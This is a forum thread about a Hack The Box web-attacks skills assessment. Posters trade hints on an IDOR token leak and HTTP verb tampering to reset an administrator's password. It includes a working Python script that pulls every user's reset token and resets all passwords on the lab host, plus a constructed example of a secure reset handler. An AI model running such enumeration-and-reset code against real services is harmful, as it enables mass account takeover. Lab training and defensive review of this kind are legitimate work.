Web Attacks - Skills Assessment

I have found the uid of the Admin user but I can’t change the password. I am getting “Access Denied” message.

1: Find a way to reset your own password
2: Try this for other users as well
3: Try other methods with the same content, e.g. PUT/GET:

GET /reset.php?uid=XX&token=XX-XX-XX-XX&password=test123

4 Likes

this is my python script

import requests

url_template = 'http://46.101.78.65:31909/api.php/token/{}'
reset_url = 'http://46.101.78.65:31909/reset.php'
get_url_template = 'http://46.101.78.65:31909/api.php/user/{}'

data = {
    'uid': '',
    'token': '',
    'password': '1'
}

for i in range(1, 101):
    print('Processing user {}...'.format(i))
    # Build the URL to get the token
    token_url = url_template.format(i)

    # Send GET request to obtain the token
    token_response = requests.get(token_url)

    # Check the response status code
    if token_response.status_code == 200:
        # Retrieve the token from the response
        token_json_data = token_response.json()
        token = token_json_data.get('token')
        print('Obtained token:', token)

        # Update the token and uid in the request data
        data['token'] = token
        data['uid'] = str(i)

        # Send the password-reset request (PATCH), passing the parameters both in the query string and in the body
        response = requests.patch(reset_url + "?uid=" + str(i) + "&token=" + token + "&password=1", data=data)

        # Check the response status code
        if response.status_code == 200:
            # Request successful
            print('Second request successful!')
            print('Response content:', response.text)
        else:
            # Request failed
            print('Second request failed. Status code:', response.status_code)

        # Check if the user is an administrator
        get_url = get_url_template.format(i)
        get_response = requests.get(get_url)
        if get_response.status_code == 200:
            print('User information:', get_response.text)
            # Check if the response contains the string 'admin', case-insensitive
            if 'admin' in get_response.text.lower():
                # Contains 'admin', indicating administrative privileges
                print('=============================== Potential administrator user found!')
        else:
            # Request failed (report the status of the user-info request, not the earlier reset request)
            print('Request failed. Status code:', get_response.status_code)
    else:
        # Failed to obtain the token
        print('Failed to obtain token. Status code:', token_response.status_code)
1 Like

I’ve just completed this skills assessment, for me the most difficult of the entire Bug Bounty path. I must say that without the hints made available in this thread, I would not have been able to complete the challenge. I wonder whether it would not have been better if Hack the Box staff organized the skills assessment with structured hints, which of course do not give us a straightforward answer but also do not make us feel completely lost and forced to peruse threads like this for hours trying to find an answer (I have a full-time job and I cannot dedicate the entirety of my day to complete CTFs, even if I would have been happy if this were the case :sweat_smile:).

1 Like

I’m stuck for several days trying to reset the “Administrator”'s password. I found all 100 users including the “Administrator” and I have his uid, token, username, full name, and company. I have tried verb tampering by using all http verbs but the response I get was “Access Denied” for POST; “Missing parameters” for GET, DELETE, OPTIONS, PUT and PATCH; just the response header for HEAD; “405 Method Not Allowed” for TRACE; and “400 Bad Request” for CONNECT. Any assistance will be appreciated.

You’re close, certain HTTP methods give you the response “missing parameters”, maybe try supplying some parameters and see what happens

1 Like

Thanks for the reply. I figured it out. Looking back now, it was much easier than I thought. I had all the info I needed, I just needed to apply some of it when verb tampering.
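The two weaknesses this thread revolves around are a token endpoint that hands out any user's reset token by uid (IDOR) and a reset handler whose authorization check depends on the HTTP verb used. The following is an added example of how a reset handler avoids both; it is not code from the lab, from Hack The Box, or from anyone in this thread. The store, the user records, `issue_reset_token`, `reset_password` and the 15-minute lifetime are all constructed for illustration.

```python
import hashlib
import secrets
import time

# Constructed in-memory user store (example data, not the lab's users).
USERS = {
    1: {"username": "alice", "role": "user", "password_hash": None},
    2: {"username": "administrator", "role": "admin", "password_hash": None},
}

# sha256(token) -> (uid, expiry). Only the hash is stored; the raw token goes
# to the account's verified contact channel and is never returned by any API,
# so there is nothing for a /token/{uid} style enumeration to read.
RESET_TOKENS = {}
TOKEN_TTL_SECONDS = 900

# A single allowed verb: every other method is rejected before any parameter
# handling, so there is no alternate method that skips the checks below.
ALLOWED_METHODS = {"POST"}


def issue_reset_token(uid, now=None):
    """Create a single-use token bound to one uid. The caller delivers it out of band."""
    if uid not in USERS:
        return None
    now = time.time() if now is None else now
    raw = secrets.token_urlsafe(32)
    digest = hashlib.sha256(raw.encode()).hexdigest()
    RESET_TOKENS[digest] = (uid, now + TOKEN_TTL_SECONDS)
    return raw


def reset_password(method, uid, token, new_password, now=None):
    """Return (status, message). The same validation runs for every request."""
    now = time.time() if now is None else now
    if method.upper() not in ALLOWED_METHODS:
        return 405, "Method Not Allowed"
    if not (uid and token and new_password):
        return 400, "Missing parameters"
    digest = hashlib.sha256(token.encode()).hexdigest()
    entry = RESET_TOKENS.get(digest)
    # One generic error: the response must not reveal whether the uid,
    # the token, or the expiry was the failing part.
    if entry is None or entry[0] != uid or entry[1] < now:
        return 403, "Access Denied"
    # Consume the token before changing anything so it cannot be replayed.
    del RESET_TOKENS[digest]
    salt = secrets.token_bytes(16)
    derived = hashlib.pbkdf2_hmac("sha256", new_password.encode(), salt, 200_000)
    USERS[uid]["password_hash"] = salt.hex() + ":" + derived.hex()
    return 200, "Password reset"


if __name__ == "__main__":
    t = issue_reset_token(1)
    print(reset_password("GET", 1, t, "hunter2"))    # 405: verb rejected
    print(reset_password("POST", 2, t, "hunter2"))   # 403: token is bound to uid 1
    print(reset_password("POST", 1, t, "hunter2"))   # 200
    print(reset_password("POST", 1, t, "hunter3"))   # 403: token already consumed
```

The points to check when reviewing a reset flow are the ones the example encodes: the token is bound to the uid it was issued for and compared against that binding, it is never retrievable through an authenticated or unauthenticated lookup, it expires and is single-use, and the method check happens before the parameter check so that "Missing parameters" on a different verb cannot become a path around "Access Denied".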

I’ve used Burp Intruder for enumeration of the users, worked fine and didn’t request any extra tools/applications.

Lost some time because I was looking for flag.php instead of /flag.php

You saved me Ronh! Thanks for the assist!

The only problem is getting the right token! Where can I find it?

And should the token be for the admin? Or is it static for all users?